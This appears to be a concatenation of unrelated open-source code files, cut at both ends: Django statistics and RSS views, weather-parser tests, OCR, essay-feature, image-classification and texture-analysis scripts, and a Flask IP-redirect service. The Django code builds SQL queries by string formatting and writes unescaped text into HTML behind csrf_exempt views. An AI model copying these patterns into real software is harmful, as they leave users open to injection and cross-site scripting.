project_id else 14\n }\n },\n \"color\": \"#ee6666\" if project_id else colors_q.get()\n }\n }\n }\n for d in days:\n cursor.execute(\n \"select count(*) from api_test_report where (c_date between '{}' and '{}') and project_title = '{}' and test_ret = 1\".format(\n str(d), str(d + datetime.timedelta(days=1)), project.title\n ))\n succed_count = str(cursor.fetchone()[0])\n temp_succeed[\"data\"].append(succed_count)\n\n cursor.execute(\n \"select count(*) from api_test_report where (c_date between '{}' and '{}') and project_title = '{}' and test_ret = 0\".format(\n str(d), str(d + datetime.timedelta(days=1)), project.title\n ))\n fail_count = cursor.fetchone()[0]\n temp_fail[\"data\"].append(str(fail_count))\n\n series.append(temp_succeed)\n series.append(temp_fail)\n\n return response_200(series=series, titles=titles, days=days)\n\n\n# 按人员统计 用例总数,近7周增加\ndef staticitem_user(req):\n days_raw = [] # [\"2021-07-01\", \"2021-07-07\", ...]\n days = [] # [\"2021-07-01 -- 2021-07-07\", \"2021-07-01 -- 2021-07-07\", ...]\n # 测试组全部成员,有限使用自定义的,没有自定义的,用全部的django用户\n try:\n users = str_to_list(ApiUser.m.get(type_id=\"1\").users or \"\")\n except:\n users = []\n users_raw = User.objects.filter()\n for user in users_raw:\n users.append(user.username)\n\n series = []\n\n today = datetime.date.today() # 获得今天的日期\n # 本周第一天和最后一天\n this_week_start = today - datetime.timedelta(days=today.weekday())\n # this_week_end = today + datetime.timedelta(days=6 - today.weekday())\n days_raw.append([this_week_start, today])\n for i in range(1, 7):\n # 上周第一天和最后一天\n last_week_start = today - datetime.timedelta(days=today.weekday() + 7 * i)\n last_week_end = today - datetime.timedelta(days=today.weekday() + 1 + 7 * (i-1))\n days_raw.append([last_week_start, last_week_end])\n # print(days)\n\n for user in users:\n temp = {\n \"name\": user,\n \"type\": 'line',\n \"data\": []\n }\n series.append(temp)\n\n cursor = connection.cursor()\n for day in days_raw:\n days.append(\"{} - {}\".format(str(day[0]).replace(\"-\", \"/\"), str(day[1]).replace(\"-\", \"/\")))\n sql = \"SELECT create_user, count(*) FROM api_case WHERE (c_date between '{}' and '{}') and isDelete=false GROUP BY create_user;\".format(\n str(day[0]), str(day[1] + datetime.timedelta(days=1)))\n # print(sql)\n cursor.execute(sql)\n rets = cursor.fetchall()\n for serie in series:\n for ret in rets:\n if 
ret[0] == serie[\"name\"]:\n serie[\"data\"].append(ret[1])\n break\n else:\n serie[\"data\"].append(0)\n\n return response_200(series=series, users=users, days=days)\n\n\n# 统计每个人创建的用例数量\ndef staticitem_user2(req):\n series = []\n cursor = connection.cursor()\n sql = \"SELECT create_user_id, count(*) FROM api_case WHERE isDelete=false group by create_user_id;\"\n cursor.execute(sql)\n\n for line in cursor.fetchall():\n series.append({\"name\": User.objects.get(id=line[0]).username or \"无\", \"value\": line[1]})\n\n return response_200(series=series)\n\n# def get_host_ip():\n# try:\n# s = socket.socket()\n# s.connect((\"www.baidu.com\", 80))\n# ip = s.getsockname()[0]\n# finally:\n# s.close()\n# return ip\n\n\n\ndef strToBase64(s):\n '''\n 将字符串转换为base64字符串\n :param s:\n :return:\n '''\n strEncode = base64.b64encode(s.encode('utf8'))\n return str(strEncode, encoding='utf8')\n\n\ndef base64ToStr(s):\n '''\n 将base64字符串转换为字符串\n :param s:\n :return:\n '''\n strDecode = base64.b64decode(bytes(s, encoding=\"utf8\"))\n return str(strDecode, encoding='utf8')\n\n","sub_path":"api/view_basic.py","file_name":"view_basic.py","file_ext":"py","file_size_in_byte":25244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"216284261","text":"\"\"\"Test MOS Parsing.\"\"\"\n\nimport pytest\nfrom pyiem.nws.products.mos import parser as mosparser\nfrom pyiem.util import get_dbconn, utc, get_test_file\n\n\n@pytest.fixture\ndef cursor():\n \"\"\"Return a database cursor.\"\"\"\n return get_dbconn('mos').cursor()\n\n\ndef test_180125_empty(cursor):\n \"\"\"Can we parse a MOS product with empty data\"\"\"\n utcnow = utc(2018, 1, 26, 1)\n prod = mosparser(get_test_file(\"MOS/MET_empty.txt\"), utcnow=utcnow)\n assert len(prod.data) == 3\n assert len(prod.data[0]['data'].keys()) == 21\n\n inserts = prod.sql(cursor)\n assert inserts == 42\n\n\ndef test_parse(cursor):\n \"\"\"MOS type\"\"\"\n utcnow = utc(2017, 8, 12, 12)\n prod = mosparser(get_test_file(\"MOS/METNC1.txt\"), utcnow=utcnow)\n assert len(prod.data) == 4\n assert len(prod.data[0]['data'].keys()) == 21\n\n inserts = prod.sql(cursor)\n assert inserts == (4 * 21)\n\n\ndef test_empty_nbm(cursor):\n \"\"\"Does an empty product trip us up.\"\"\"\n utcnow = utc(2018, 11, 7, 17)\n prod = mosparser(get_test_file(\"MOS/NBSUSA_empty.txt\"), utcnow=utcnow)\n assert len(prod.data) == 2\n\n inserts = prod.sql(cursor)\n assert inserts == 0\n\n\ndef test_nbm(cursor):\n \"\"\"Can we parse the NBM data.\"\"\"\n utcnow = utc(2018, 11, 7, 15)\n prod = mosparser(get_test_file(\"MOS/NBSUSA.txt\"), utcnow=utcnow)\n assert len(prod.data) == 2\n\n inserts = prod.sql(cursor)\n assert inserts == (2 * 21)\n\n cursor.execute(\"\"\"\n SELECT count(*), max(ftime) from t2018\n where model = 'NBS' and station = 'KALM' and runtime = %s\n \"\"\", (utcnow, ))\n row = cursor.fetchone()\n assert row[0] == 21\n assert row[1] == utc(2018, 11, 10, 9)\n","sub_path":"pyiem/nws/products/tests/test_mos.py","file_name":"test_mos.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"557251429","text":"# -*- encoding: utf-8 -*-\n# Copyright (C) 2017 TSDV TTEC. 
All rights reserved.\n\n\nclass WordProperty(object):\n \"\"\"\n This class handle word element get from element tree\n \"\"\"\n def __init__(self, word):\n if word is not None:\n self.id = word.id\n self.x = word.x\n self.y = word.y\n self.w = word.w\n self.h = word.h\n self.color = str(word.color)\n self.highlight_color = str(word.highlight_color)\n self.spaces_before = word.spaces_before\n self.x_wconf = float(word.wfont)\n self.font_name = str(word.font)\n self.font_size = float(word.size)\n self.value = word.value\n self.bold = word.bold\n self.italic = word.italic\n self.underline = word.underline\n else:\n self.id = None\n self.x = None\n self.y = None\n self.w = None\n self.h = None\n self.color = None\n self.highlight_color = None\n self.spaces_before = None\n self.x_wconf = None\n self.font_name = None\n self.font_size = None\n self.value = None\n self.bold = None\n self.italic = None\n self.underline = None\n","sub_path":"Run_PHocr_test/PHOcr_C2404_D3_linux_release/lib/phocroffice/phocr_shared/word_property.py","file_name":"word_property.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"439870945","text":"# coding=utf-8\n\n# construct unique key using settings for pickling\nimport Settings\n\n\"\"\" PETER - CHANGE THESE FILE PATHS \"\"\"\n\"\"\" DATA - raw essay files + annotations\"\"\"\nroot = \"/Users/simon.hughes/Google Drive/PhD/Data/ActiveLearning/\"\ndata = root + \"EBA1415_Merged/\" # Location where the data is, use EBA_Pre and Post test essays preferably\n\n\"\"\" OUTPUT - two serialized files, one for the pre-processed essays, the other for the features \"\"\"\nserialized_features = root + \"essay_feats.pl\"\nserialized_essays = root + \"essays.pl\"\n\"\"\" END SETTINGS \"\"\"\n\nfrom featureextractortransformer import FeatureExtractorTransformer\nfrom load_data import load_process_essays\n\nfrom featureextractionfunctions import *\nfrom window_based_tagger_config import get_config\n\nimport cPickle as pickle\nimport logging\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\nlogger = logging.getLogger()\n\n# not hashed as don't affect persistence of feature processing\n\nconfig = get_config(data)\n\n\"\"\" FEATURE EXTRACTION \"\"\"\noffset = (config[\"window_size\"] - 1) / 2\n\nunigram_window_stemmed = fact_extract_positional_word_features_stemmed(offset)\nbiigram_window_stemmed = fact_extract_ngram_features_stemmed(offset, 2)\n\nextractors = [unigram_window_stemmed, biigram_window_stemmed]\nfeat_config = dict(config.items() + [(\"extractors\", extractors)])\n\n\"\"\" LOAD DATA \"\"\"\ntagged_essays = load_process_essays( **config )\nlogger.info(\"Essays loaded\")\n# most params below exist ONLY for the purposes of the hashing to and from disk\nfeature_extractor = FeatureExtractorTransformer(extractors)\n\nessay_feats = feature_extractor.transform(tagged_essays)\nlogger.info(\"Features loaded\")\n\nwith open(serialized_essays, \"w+\") as f_essays:\n pickle.dump(tagged_essays, f_essays)\n\nwith open(serialized_features, \"w+\") as f_feats:\n pickle.dump(essay_feats, f_feats)\n\nlogger.info(\"Serialized\")","sub_path":"Experiments/CoralBleaching_ActiveLearning/CreateTrainingData.py","file_name":"CreateTrainingData.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"634970857","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nUdacity 
project\r\n\r\nBy Jean Desire.\r\n\"\"\"\r\n# =============================================================================\r\n# Import Libraries\r\n# =============================================================================\r\n\r\nimport numpy as np\r\nimport torch\r\nimport os\r\nimport time\r\nimport random\r\nimport json\r\nfrom math import ceil\r\nfrom torch import nn,optim\r\nimport torch.nn.functional as F\r\nimport torchvision\r\nfrom torchvision import datasets,transforms,models\r\nfrom collections import OrderedDict\r\nfrom torch.autograd import Variable\r\nfrom PIL import Image\r\nimport copy\r\nimport argparse\r\nfrom os.path import isdir\r\n\r\n# =============================================================================\r\n# Define Functions\r\n# =============================================================================\r\n\r\ndef arg_parser():\r\n    \r\n    parser = argparse.ArgumentParser(description=\"Neural Network Settings\")\r\n\r\n    # Image for prediction\r\n    parser.add_argument('--image', \r\n                        type=str, \r\n                        help='Point to image file for prediction.',\r\n                        required=True)\r\n\r\n    # Load checkpoint created in train.py\r\n    parser.add_argument('--checkpoint', \r\n                        type=str, \r\n                        help='Point to checkpoint file as str.',\r\n                        required=True)\r\n    \r\n    # top-k\r\n    parser.add_argument('--top_k', \r\n                        type=int, \r\n                        help='top k classes.')\r\n    \r\n    # Import category names\r\n    parser.add_argument('--category_names', \r\n                        type=str, \r\n                        help='names of structures/architectures.')\r\n\r\n    # Add GPU \r\n    parser.add_argument('--gpu', \r\n                        action=\"store_true\", \r\n                        help='GPU ')\r\n\r\n    # Parse args\r\n    args = parser.parse_args()\r\n    \r\n    return args\r\n\r\ndef load_checkpoint(checkpoint_path):\r\n    # Load the saved file (use the path argument instead of a hard-coded name)\r\n    checkpoint = torch.load(checkpoint_path)\r\n    \r\n    # Load Defaults if none specified\r\n    if checkpoint['architecture'] == 'vgg16':\r\n        model = models.vgg16(pretrained=True)\r\n        model.name = \"vgg16\"\r\n    else: \r\n        # exec() cannot rebind a local name in Python 3; resolve the\r\n        # constructor by name instead\r\n        model = getattr(models, checkpoint['architecture'])(pretrained=True)\r\n        model.name = checkpoint['architecture']\r\n    \r\n    # Freeze parameters so we don't backprop through them\r\n    for param in model.parameters(): param.requires_grad = False\r\n    \r\n    # Load stuff from checkpoint\r\n    model.class_to_idx = checkpoint['class_to_idx']\r\n    model.classifier = checkpoint['classifier']\r\n    model.load_state_dict(checkpoint['state_dict'])\r\n    \r\n    return model\r\n\r\n\r\n\r\ndef process_image(image):\r\n    ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\r\n        returns a Numpy array\r\n    '''\r\n    # open the image passed in, rather than overwriting it with a fixed path\r\n    pil_image = Image.open(image)\r\n    \r\n    adjustments = transforms.Compose([\r\n        transforms.Resize(256),\r\n        transforms.CenterCrop(224),\r\n        transforms.ToTensor(),\r\n        transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n    ])\r\n    \r\n    img_tensor = adjustments(pil_image)\r\n    np_image = np.array(img_tensor)\r\n    \r\n    return np_image
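\r\n\r\n\r\n# NOTE (added): check_gpu() is called from main() below but was missing from\r\n# this file; this is a minimal sketch, assuming it should pick a torch device\r\n# based on the --gpu flag.\r\ndef check_gpu(gpu_arg):\r\n    # fall back to CPU when no GPU was requested or none is available\r\n    if gpu_arg and torch.cuda.is_available():\r\n        return torch.device(\"cuda\")\r\n    return torch.device(\"cpu\")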
\r\n\r\n\r\ndef predict(image_tensor, model, device, cat_to_name, top_k):\r\n    ''' Predict the class (or classes) of an image using a trained deep learning model.\r\n    \r\n    image_path: string. Path to image, directly to image and not to folder.\r\n    model: pytorch neural network.\r\n    top_k: integer. The top K classes to be calculated\r\n    \r\n    returns top_probabilities(k), top_labels\r\n    '''\r\n    \r\n    # check top_k\r\n    if top_k is None:\r\n        top_k = 5\r\n        print(\"Top K not specified, assuming K=5.\")\r\n    \r\n    # Set model to evaluate\r\n    model.eval()\r\n\r\n    # Convert image from numpy to torch\r\n    torch_image = torch.from_numpy(np.expand_dims(image_tensor, \r\n                                                  axis=0)).type(torch.FloatTensor)\r\n\r\n    model = model.cpu()\r\n\r\n    # Find probabilities (results) by passing through the function (note the log softmax means that it's on a log scale)\r\n    log_probs = model.forward(torch_image)\r\n\r\n    # Convert to linear scale\r\n    linear_probs = torch.exp(log_probs)\r\n\r\n    # Find the top K results\r\n    top_probs, top_labels = linear_probs.topk(top_k)\r\n    \r\n    # Detach all of the details\r\n    top_probs = np.array(top_probs.detach())[0] \r\n    top_labels = np.array(top_labels.detach())[0]\r\n    \r\n    # Convert to classes\r\n    idx_to_class = {val: key for key, val in \r\n                    model.class_to_idx.items()}\r\n    top_labels = [idx_to_class[lab] for lab in top_labels]\r\n    top_flowers = [cat_to_name[lab] for lab in top_labels]\r\n    \r\n    return top_probs, top_labels, top_flowers\r\n\r\n\r\ndef print_probability(probs, flowers):\r\n    \"\"\"\r\n    Prints ranked flower names with their likelihoods\r\n    \"\"\"\r\n    \r\n    for i, j in enumerate(zip(flowers, probs)):\r\n        print(\"Rank {}:\".format(i+1),\r\n              \"Flower: {}, likelihood: {}%\".format(j[0], ceil(j[1]*100)))\r\n\r\n    \r\n# =============================================================================\r\n# Main Function\r\n# ============================================================================= \r\ndef main():\r\n    \"\"\"\r\n    Executing relevant functions\r\n    \"\"\"\r\n    \r\n    # Get Keyword Args for Prediction\r\n    args = arg_parser()\r\n    \r\n    # Load categories to names json file\r\n    with open(args.category_names, 'r') as f:\r\n        cat_to_name = json.load(f)\r\n\r\n    # Load model trained with train.py\r\n    model = load_checkpoint(args.checkpoint)\r\n    \r\n    # Process Image\r\n    image_tensor = process_image(args.image)\r\n    \r\n    # Check for GPU\r\n    device = check_gpu(gpu_arg=args.gpu)\r\n    \r\n    # The top K most likely classes\r\n    top_probs, top_labels, top_flowers = predict(image_tensor, model, \r\n                                                 device, cat_to_name,\r\n                                                 args.top_k)\r\n    \r\n    # Print out probabilities (probs first, flowers second, matching the signature)\r\n    print_probability(top_probs, top_flowers)\r\n\r\n\r\n# =============================================================================\r\n# Run Program\r\n# =============================================================================\r\nif __name__ == '__main__': main()\r\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"643793147","text":"\"\"\"\nMake & save the final plots used in the paper.\n\"\"\"\n\n\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt \nimport os \n\n# plot format -- can put this in config file but that's too much work for so little change \nplt.style.use('default')  # pd.options.display.mpl_style was removed from pandas\nmpl.rcParams['axes.facecolor'] = 'w' # Give me back the white background!\nmpl.rcParams['axes.labelsize'] = 24\nmpl.rcParams['lines.linewidth'] = 1.5\nmpl.rcParams['lines.markersize'] = 8\nmpl.rcParams['lines.markeredgewidth'] = 1.0\n\n\nDATA_PATH = \"C:\\\\Users\\\\t-yeresh\\\\data\\\\storks2012\"
\nTABLE_DATA_PATH = \"C:\\\\Users\\\\t-yeresh\\\\Google Drive\\\\PhD\\\\Manuscripts\\\\DSAA15--journal version\\\\res\"\n\n\ndef loss_plot(in_name, out_name, y_label):\n    \"\"\" The 0-1 and log loss plots; data in the .csv files comes from the log of main.py\n        Make plots with no background, large text, large legend, large X marks -- LARGE EVERYTHING! \n    \"\"\"\n    # pd.DataFrame.from_csv is deprecated; read_csv with index_col=0 is equivalent here\n    f = pd.read_csv(os.path.join(TABLE_DATA_PATH, in_name), index_col=0)\n    f.plot(style=['>:','<--','^-.', 's--', 'o-'])\n    plt.xlabel(\"Number of clusters\", fontsize=20)\n    plt.ylabel(y_label, fontsize=20)\n    plt.legend(loc = 'center left', bbox_to_anchor=(1.0, 0.5))\n    plt.savefig(os.path.join(TABLE_DATA_PATH, out_name), bbox_inches=\"tight\")\n    plt.close()\n\ndef walking_plots():\n    \"\"\" Data comes from raw ACC \"\"\" \n    pass\n\nif __name__ == \"__main__\":\n    loss_plot(\"0-1-loss.txt\", \"0-1.png\", \"0-1 loss\")\n    loss_plot(\"log-loss.txt\", \"log.png\", \"Log loss\")","sub_path":"acc_stuff/self_contained/DSAA/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"252869084","text":"#!/usr/bin/env python\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n    abort, render_template, flash, Response\n\nimport redis\nredis = redis.StrictRedis(host='localhost', port=6379, db=0)\n\napp = Flask(__name__)\napp.debug = True\n\n\ndef ip_delete_store(remoteip):\n    app.logger.debug(\"delete {}\".format(remoteip))\n    return redis.delete(remoteip)\n\ndef ip_get_store(remoteip):\n    app.logger.debug(\"getting {}\".format(remoteip))\n    return redis.get(remoteip)\n\ndef ip_set_store(remoteip,localip):\n    app.logger.debug(\"setting {} to {}\".format(remoteip,localip))\n    return redis.set(remoteip,localip)
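\n\n# (added) illustrative use of this little IP-registry service, assuming it\n# runs on port 8001 as configured below:\n#   curl -X POST --data 192.168.1.23 http://server:8001/   # register my LAN IP\n#   curl http://server:8001/                               # 302 -> http://192.168.1.23/\n#   curl -X DELETE http://server:8001/                     # forget it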
\n\n@app.route('/',methods=[\"GET\"])\ndef get_ip():\n    remoteip = request.access_route[0]\n    localip = ip_get_store(remoteip)\n    if localip:\n        return redirect(\"http://{}/\".format(localip), 302)\n    else:\n        return Response(\"No IP stored for you\")\n\n@app.route('/',methods=[\"POST\"])\ndef set_ip():\n    remoteip = request.access_route[0]\n    localip = request.get_data()\n    return Response(str(ip_set_store(remoteip,localip)))\n\n@app.route('/',methods=[\"DELETE\"])\ndef delete_ip():\n    remoteip = request.access_route[0]\n    return Response(str(ip_delete_store(remoteip)))\n\n\nif __name__ == '__main__':\n    app.run(port=8001)\n","sub_path":"mycube/websrv.py","file_name":"websrv.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"369787642","text":"#! /usr/bin/jython\n# -*- encoding: utf-8 -*-\n# ----------------------------------------------------------\n#\n#\tepub_create.py\n#\n#\t\t\t\t\t\tSep/17/2014\n#\n# ----------------------------------------------------------\nimport\tsys\nimport\tjava\nfrom java.lang import\tSystem\nfrom java.lang import\tString\n\nfrom java.io import FileOutputStream\n\nfrom com.adobe.dp.epub.io import OCFContainerWriter\nfrom com.adobe.dp.epub.ncx import TOCEntry\nfrom com.adobe.dp.epub.opf import NCXResource\nfrom com.adobe.dp.epub.opf import OPSResource\nfrom com.adobe.dp.epub.opf import Publication\nfrom com.adobe.dp.epub.ops import Element\nfrom com.adobe.dp.epub.ops import OPSDocument\n\n\nsys.path.append ('/var/www/data_base/common/python_common')\nfrom text_manipulate import dict_append_proc\n# ----------------------------------------------------------\ndef dict_to_epub_proc (epub_file,dict_aa):\n\tepub = Publication()\n\n\tepub.addDCMetadata(\"title\", \"My First EPUB\")\n\tepub.addDCMetadata(\"creator\", System.getProperty(\"user.name\"))\n\tepub.addDCMetadata(\"language\", \"ja\")\n\n\ttoc = epub.getTOC()\n\trootTOCEntry = toc.getRootTOCEntry()\n\n\tmain = epub.createOPSResource(\"OPS/main.html\")\n\tepub.addToSpine(main)\n\n\tmainDoc = main.getDocument()\n\n\tmainTOCEntry = toc.createTOCEntry(\"Intro\", mainDoc.getRootXRef())\n\trootTOCEntry.add(mainTOCEntry)\n\n\tbody = mainDoc.getBody()\n\n\tfor key in dict_aa.keys():\n\t\tunit_aa = dict_aa[key]\n\t\tparagraph_bb = mainDoc.createElement(\"p\")\n\t\tname = unit_aa[\"name\"]\n#\n\t\tpopulation = unit_aa[\"population\"]\n\t\tstr_population = str (population)\n\t\tdate_mod = unit_aa[\"date_mod\"]\n\t\tparagraph_bb.add(key)\n\t\tparagraph_bb.add(\" \")\n\t\tparagraph_bb.add(name)\n\t\tparagraph_bb.add(\" \")\n\t\tparagraph_bb.add(str_population)\n\t\tparagraph_bb.add(\" \")\n\t\tparagraph_bb.add(date_mod)\n\t\tbody.add(paragraph_bb)\n\n\twriter = OCFContainerWriter (FileOutputStream(epub_file))\n#\twriter = OCFContainerWriter.new(FileOutputStream.new(epub_file))\n\tepub.serialize(writer)\n#\n# ----------------------------------------------------------\ndef data_prepare_proc ():\n\tdict_aa = {}\n\n\tdict_aa = dict_append_proc(dict_aa,'t1931','甲府'.decode('utf-8'),81635,'2004-2-11')\n\tdict_aa = dict_append_proc(dict_aa,'t1932','富士吉田'.decode('utf-8'),39427,'2004-4-23')\n\tdict_aa = dict_append_proc(dict_aa,'t1933','都留'.decode('utf-8'),61523,'2004-5-24')\n\tdict_aa = dict_append_proc(dict_aa,'t1934','山梨'.decode('utf-8'),18624,'2004-9-14')\n\tdict_aa = dict_append_proc(dict_aa,'t1935','大月'.decode('utf-8'),72931,'2004-8-12')\n\tdict_aa = dict_append_proc(dict_aa,'t1936','韮崎'.decode('utf-8'),28519,'2004-7-28')\n\tdict_aa = dict_append_proc(dict_aa,'t1937','南アルプス'.decode('utf-8'),39457,'2004-6-19')\n\tdict_aa = dict_append_proc(dict_aa,'t1938','北杜'.decode('utf-8'),36872,'2004-11-15')\n\tdict_aa = dict_append_proc(dict_aa,'t1939','甲斐'.decode('utf-8'),81235,'2004-10-24')\n\n\treturn\tdict_aa\n#\n# ----------------------------------------------------------\nprint (\"*** Start ***\")\n\nepub_file = sys.argv[1]\n\ndict_aa = data_prepare_proc()\n\ndict_to_epub_proc(epub_file,dict_aa)\n\nprint (\"*** End ***\")\n# ----------------------------------------------------------\n","sub_path":"epub/jython/create/epub_create.py","file_name":"epub_create.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"211110478","text":"from django.shortcuts import render\nfrom django.http 
import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport urllib.request\nfrom barrapunto.models import Page\nfrom xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\n# Create your views here.\n\ncontent_Rss = \"\"\n\n\nclass myContentHandler(ContentHandler):\n texto = \"\"\n\n def __init__(self):\n self.inItem = False\n self.inContent = False\n self.theContent = \"\"\n\n def startElement(self, name, attrs):\n if name == 'item':\n self.inItem = True\n elif self.inItem:\n if name == 'title':\n self.inContent = True\n elif name == 'link':\n self.inContent = True\n\n def endElement(self, name):\n if name == 'item':\n self.inItem = False\n elif self.inItem:\n if name == 'title':\n self.texto += (\"
<br><b>Title: \" + self.theContent + \".</b><br>\")\n                # To avoid Unicode trouble\n                self.inContent = False\n                self.theContent = \"\"\n            elif name == 'link':\n                self.texto += (\"<br><b>Link: \" + \"<a href=#>\" + self.theContent + \"</a></b><br>\")\n            self.inContent = False\n            self.theContent = \"\"\n\n    def characters(self, chars):\n        if self.inContent:\n            self.theContent = self.theContent + chars
    \" + pagina.name + \" --> Id = \" + str(pagina.id)\n respuesta += \"
    Debe buscar por Id\"\n return HttpResponse(respuesta)\n\n\n@csrf_exempt\ndef pagina(request, identificador):\n if request.method == \"GET\":\n # Buscar en la base de datos\n try:\n pagina = Page.objects.get(id=identificador)\n # si existe\n respuesta = (\"
    \" + pagina.page + \"
    \" +\n content_Rss + \"
    \")\n except Page.DoesNotExist:\n # no existe\n respuesta = \"No existe la pagina con el ID = \" + str(identificador)\n\n elif request.method == \"PUT\":\n cuerpo = request.body.decode('utf-8')\n name, page = cuerpo.split(\",\")\n pagina = Page(name=name, page=page)\n pagina.save()\n respuesta = \"He detectado un PUT, Guardado en Base de datos\"\n else:\n respuesta = \"Metodo No Permitido\"\n return HttpResponse(respuesta)\n\n\ndef update(request):\n # detecto update\n global content_Rss\n theParser = make_parser()\n theHandler = myContentHandler()\n theParser.setContentHandler(theHandler)\n url = \"http://barrapunto.com/index.rss\"\n f = urllib.request.urlopen(url)\n theParser.parse(f)\n # saco el contetn_Rss\n content_Rss = theHandler.texto\n respuesta = (\"
    Noticias Barrapunto: \" + content_Rss +\n \"
    \")\n return HttpResponse(respuesta)\n\n\ndef notFound(request, rec):\n respuesta = \"Elemento \" + rec + \" no encontrado\"\n return HttpResponse(respuesta)\n","sub_path":"Version_2/myproject/barrapunto/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"442517849","text":"\"\"\"\n\n'Contrast' : 对比度 返回整幅图像中像素和它相邻像素之间的亮度反差。取值范围:[0,(GLCM行数-1)^2]。灰度一致的图 像,对比度为0。\n'Correlation' : 相关 返回整幅图像中像素与其相邻像素是如何相关的度量值。取值范围:[-1,1]。灰度一致的图像,相关性为NaN。\n'Energy' : 能量 返回GLCM中元素的平方和。取值范围:[0 1]。灰度一致的图像能量为1。\n'Homogemeity' : 同质性 返回度量GLCM中元素的分布到对角线紧密程度。取值范围:[0 1]。对角矩阵的同质性为1。\n\n\"\"\"\nimport cv2\nimport math\n\n# 定义最大灰度级数\ngray_level = 16\ndef maxGrayLevel(img):\n max_gray_level = 0\n (height, width) = img.shape\n print\n height, width\n for y in range(height):\n for x in range(width):\n if img[y][x] > max_gray_level:\n max_gray_level = img[y][x]\n return max_gray_level + 1\n\n\ndef getGlcm(input, d_x, d_y):\n srcdata = input.copy()\n ret = [[0.0 for i in range(gray_level)] for j in range(gray_level)]\n (height, width) = input.shape\n max_gray_level = maxGrayLevel(input)\n # 若灰度级数大于gray_level,则将图像的灰度级缩小至gray_level,减小灰度共生矩阵的大小\n if max_gray_level > gray_level:\n for j in range(height):\n for i in range(width):\n srcdata[j][i] = srcdata[j][i] * gray_level / max_gray_level\n\n for j in range(height - d_y):\n for i in range(width - d_x):\n rows = srcdata[j][i]\n cols = srcdata[j + d_y][i + d_x]\n ret[rows][cols] += 1.0\n\n for i in range(gray_level):\n for j in range(gray_level):\n ret[i][j] /= float(height * width)\n\n return ret\n\n\ndef feature_computer(p):\n Con = 0.0\n Eng = 0.0\n Asm = 0.0\n Idm = 0.0\n for i in range(gray_level):\n for j in range(gray_level):\n Con += (i - j) * (i - j) * p[i][j]\n Asm += p[i][j] * p[i][j]\n Idm += p[i][j] / (1 + (i - j) * (i - j))\n if p[i][j] > 0.0:\n Eng += p[i][j] * math.log(p[i][j])\n return Asm, Con, -Eng, Idm\n\n\n# def test(image_name):\n# img = cv2.imread(image_name)\n# try:\n# img_shape = img.shape\n# except:\n# print\n# 'imread error'\n# return\n# #双斜杠表示整数除法\n# img = cv2.resize(img, (img_shape[1]//2, img_shape[0]//2), interpolation=cv2.INTER_CUBIC)\n# img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# glcm_0 = getGlcm(img_gray, 1, 0)\n# glcm_1=getGlcm(img_gray, 0, 1)\n# glcm_2=getGlcm(img_gray, 1, 1)\n# glcm_3=getGlcm(img_gray, -1, 1)\n# asm0, con0, eng0, idm0 = feature_computer(glcm_0)\n# asm1, con1, eng1, idm1 = feature_computer(glcm_1)\n# asm2, con2, eng2, idm2 = feature_computer(glcm_2)\n# asm3, con3, eng3, idm3 = feature_computer(glcm_3)\n# return [asm0, con0, eng0, idm1, asm1, con1, eng1, idm2, asm2, con2, eng2, idm2, asm3, con3, eng3, idm3]\n\ndef glcminthis(img_gray):\n glcm_0 = getGlcm(img_gray, 1, 0)\n glcm_1 = getGlcm(img_gray, 0, 1)\n glcm_2 = getGlcm(img_gray, 1, 1)\n glcm_3 = getGlcm(img_gray, 1, 2)\n asm0, con0, eng0, idm0 = feature_computer(glcm_0)\n asm1, con1, eng1, idm1 = feature_computer(glcm_1)\n asm2, con2, eng2, idm2 = feature_computer(glcm_2)\n asm3, con3, eng3, idm3 = feature_computer(glcm_3)\n return [asm0, con0, eng0, idm1, asm1, con1, eng1, idm2, asm2, con2, eng2, idm2, asm3, con3, eng3, idm3]","sub_path":"glcm_extract.py","file_name":"glcm_extract.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"64468030","text":"#Script to write maths tables based on user input\n#gets two inputs, i. Table number ii. 
